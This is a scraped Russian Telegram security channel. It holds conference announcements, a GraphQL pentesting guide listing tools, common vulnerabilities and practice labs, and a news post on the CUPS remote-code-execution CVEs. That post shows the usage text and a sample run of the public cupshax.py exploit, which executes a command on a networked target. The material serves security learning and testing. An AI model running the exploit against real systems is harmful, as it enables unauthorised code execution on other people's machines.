VK Security Confab
#мероприятие
Ивент для AppSec, DevSecOps, разработчиков и в целом безопасников
🌚 @poxek | 📺 RuTube | 🌚 Мерч Похек
#мероприятие
Ивент для AppSec, DevSecOps, разработчиков и в целом безопасников
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥26👍2😁2
WAF-день в КиберДоме
#мероприятие
Открытая дисскусия "Развитие и тенденции WAF в России: будущее рынка"
🌚 @poxek | 📺 RuTube | 🌚 Мерч Похек
#мероприятие
Открытая дисскусия "Развитие и тенденции WAF в России: будущее рынка"
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍14😁7 3🔥2⚡1
Автоматизированный пентест GraphQL
#graphql #pentest
➡️ GraphQL - это открытая технология для создания и взаимодействия с API. Она была создана в 2012 году как альтернативный подход к REST - архитектурному стилю, определяющему принципы взаимодействия клиента и сервера через HTTP-запросы, стандартизированные URL и форматы данных JSON и XML.
В отличие от REST API, где ответ на запрос приходит в формате JSON и требует дальнейшего анализа для извлечения нужной информации, GraphQL позволяет получить только необходимые данные за один запрос, даже если они распределены по разным источникам. Это делает GraphQL более эффективным и удобным методом извлечения данных по сравнению с REST.
➡️ Основные преимущества GraphQL
▪️ Не нужно создавать несколько REST-запросов. Чтобы извлечь данные, достаточно ввести один запрос.
▪️ Не привязан к конкретной базе данных или механизму хранения.
▪️ Используется целая система типов данных.
Более подробно можете ознакомиться в этом видео или в этой статье.
❤️ А теперь перейдём к самой вкусной части | Пентест GraphQL
Начнём с классики, это Hacktricks . Но это скучно)
Список тулз, которые рекомендуют в интернетах:
➡️ graphw00f - тулза делает аудит на основе GraphQL Threat Matrix Project и после скана она выводит отчёт смапленный по этой матрице уязвимостей.
➡️ InQL - довольно популярное расширение для BurpSuite, которое позволяет просканировать ендпоинты GraphQL, также можете загрузить json схему в него. Этот режим позволит собрать все эндпоинты в одну центролизованную кучку. Затем перекидываете конкретный эндпоинт во вкладку Attacker и там уже можете в ручном режиме изменять запрос.
➡️ Куда же мы без ffuf и хорошего словаря для GraphQL
➡️ GraphQL Cop - данная тулза подходит и для пентестеров, и для appsec/devsecops, т.к. очень легко заворачивается в CI/CD. Есть визуально красивый текстовый вывод в консоль, а есть Json вывод. Тулза обнаруживает атаки типа DOS, Раскрытие информации, CSRF. Но как говорится, где одна бага, там и вторая)
➡️ Graphinder - добывает все graphql эндпоинты для конкретного домена
➡️ GraphQLmap - интересный интерактивный режим. Пример работы
➡️ Auto GraphQL Scanner - бурповское расширение по совету от Bo0om
➡️ Два визуализатора схем GraphQL, GraphQL Voyager и GraphQL Online
➡️ Уже все имплементировали nuclei в свои DAST, поэтому вот шаблон под детект GraphQL
➡️ В случае если интроспекция выключена, используем Clairvoyance. Он соберёт для вас json схему.
⚠️ Типичные уязвимости для GraphQL
➡️ DOS. GraphQL будут подвержены для этого типа атак, если нет ограничений на глубину запросов.
➡️ Сбатченные (batched) запросы и алиасы. К примеру вы установили rate limit на ваши эндпоинты, НО если вы разрешили сбатченные запросы, то хахакер может впихнуть множество запросов в один и тем самым это приведет к DOS или к обходу рейтов.
➡️ Некорректная или отсутствующая аутентификация и авторизация
➡️ XSS
➡️ Arbitrary File Upload & Path Traversal
➡️ RCE
🛠 Лабы для тренировок
➡️ Portswigger - не очень много тасков, нет прям сложных
➡️ DVGA (Damn Vulnerable GraphQL Application) - самая популярная лаба
➡️ vuln-graphql-api - малоизвестная лаба (сам ещё не раскатывал)
📌 Почитать ещё
➡️ Статья от ООО Бастион
➡️ Pentesting GraphQL 101 Part 1 / 2 / 3
➡️ GraphQL Pentesting for Dummies! Part- 1 / 2
➡️ GraphQL Cheat Sheet
➡️ Документация GraphQL
🌚 @poxek | 📺 RuTube | 🌚 Мерч Похек
#graphql #pentest
В отличие от REST API, где ответ на запрос приходит в формате JSON и требует дальнейшего анализа для извлечения нужной информации, GraphQL позволяет получить только необходимые данные за один запрос, даже если они распределены по разным источникам. Это делает GraphQL более эффективным и удобным методом извлечения данных по сравнению с REST.
Более подробно можете ознакомиться в этом видео или в этой статье.
Список тулз, которые рекомендуют в интернетах:
Please open Telegram to view this post
VIEW IN TELEGRAM
20🔥26👍10 3
Please open Telegram to view this post
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
#unix #RCE #CVE
CVE-2024-47176 CVE-2024-47076 CVE-2024-47175 CVE-2024-47177
Вчера вечером интернет наводнился новостью о новой баге в UNIX системах, которая позволяет выполнить неавторизованный RCE. Но были особые условия, к примеру что должна быть очередь на печать. В прикрепленном видосе демонстрируется PoC.
Авторы эксплойта изучили коммит в OpenPrinting CUPS, в котором была исправлена бага и написали эксплойт. Он использует dns-sd обнаружение принтера, требуя, чтобы цель могла получить широковещательное сообщение, т.е. находилась в той же сети.
usage: cupshax.py [-h] [--name NAME] --ip IP [--command COMMAND] [--port PORT]
A script for executing commands remotely
options:
-h, --help show this help message and exit
--name NAME The name to use (default: RCE Printer)
--ip IP The IP address of the machine running this script
--command COMMAND The command to execute (default: 'touch /tmp/pwn')
--port PORT The port to connect on (default: 8631)
python cupshax.py --name "Print to PDF (Color)" \
--command "id>/tmp/pwn" \
--ip 10.0.0.3
Please open Telegram to view this post
VIEW IN TELEGRAM
11👍22🔥7⚡2 2
Ставьте плюс в комментах кто уже на underconf.ru и кто приедет ещё
😁6👍2
Forwarded from BugXplorer (j b)
Scan for CVE-2024-47176 (CUPS - Remote Code Execution) with Nuclei
Vulnerability discovery: https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/
Nuclei Template: https://cloud.projectdiscovery.io/?template=CVE-2024-47176
Source: https://x.com/pdnuclei/status/1840195177098453308
Vulnerability discovery: https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/
Nuclei Template: https://cloud.projectdiscovery.io/?template=CVE-2024-47176
Source: https://x.com/pdnuclei/status/1840195177098453308
🔥14👍3 2⚡1
Похек
Ставьте плюс в комментах кто уже на underconf.ru и кто приедет ещё
Теперь и я на точке сбора
🔥4😁3
Underconf в Холидей ИНН
#underconf
Очень атмосферная конференция, с крутыми спецами на площадке!
Могу ещё добавить, что тут классные стенды, есть локпик, Half-Life, CS 1.6, WarHammer на ЭЛТ Мониторах))
underconf.ru
🌚 @poxek
#underconf
Очень атмосферная конференция, с крутыми спецами на площадке!
Могу ещё добавить, что тут классные стенды, есть локпик, Half-Life, CS 1.6, WarHammer на ЭЛТ Мониторах))
underconf.ru
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM